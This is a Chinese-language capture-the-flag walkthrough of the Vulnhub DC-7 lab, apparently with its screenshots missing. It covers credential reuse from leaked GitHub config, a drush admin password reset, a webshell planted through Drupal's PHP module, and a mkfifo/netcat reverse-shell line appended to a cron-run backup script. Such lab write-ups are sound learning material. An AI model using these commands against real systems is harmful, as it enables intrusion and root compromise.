Vulnhub dc-7靶机通关

安装好靶机环境，，下面会有一些提示，可是被我删掉了，懒得做还原了，在自己的环境下应该能看到

欢迎来到DC-7

DC-7引入了一些“新”概念，但是我会让您知道它们是什么。:-)

尽管这一挑战并不是技术性的全部，但是如果您需要诉诸于暴力破解或字典攻击，那么您可能不会成功。

您将要做的就是在盒子外面思考。

通过插件得知网站时通过drupal 8搭建

开放的端口有22，80

 

一开始我通过寻找druoal 8 的cve漏洞，无果，去查看前辈们的思路，太菜了

 

在网站的左下方，作者给出了一个dc7的用户

 

去百度搜索，github有一条信息，

 

进入这个作者的项目，发现了dc7的一部分源码，下载下来

 

通过config文件查找到了数据库的账号密码，尝试登录后台无果

 

然后又想到了开放了22端口，就去测试一下ssh，登录成功

 

查看当前目录下的文件，在这里看到这个目录下有一个脚本，定时执行网站备份

 

进入此目录查看内容

 

通过查看前辈们的思路，这里的突破点在drush

 

这里不能直接执行一些操作，权限不够

那么就通过drush修改掉admin的密码

drush user-password admin --password="123456"

成功登录后台，通过百度搜索，drupal后台部署拿webshell

在这个位置，可以上传一个模块

·  https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

 

 

 

 

上传完成之后，在这个位置填写一句话，使用新添加的模板

 

 

 

 

 

进入到命令行，输入反弹shell到脚本中等待计划任务执行，稍微等待后成功getshell。

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.220.155 1234 >/tmp/f" >> backups.sh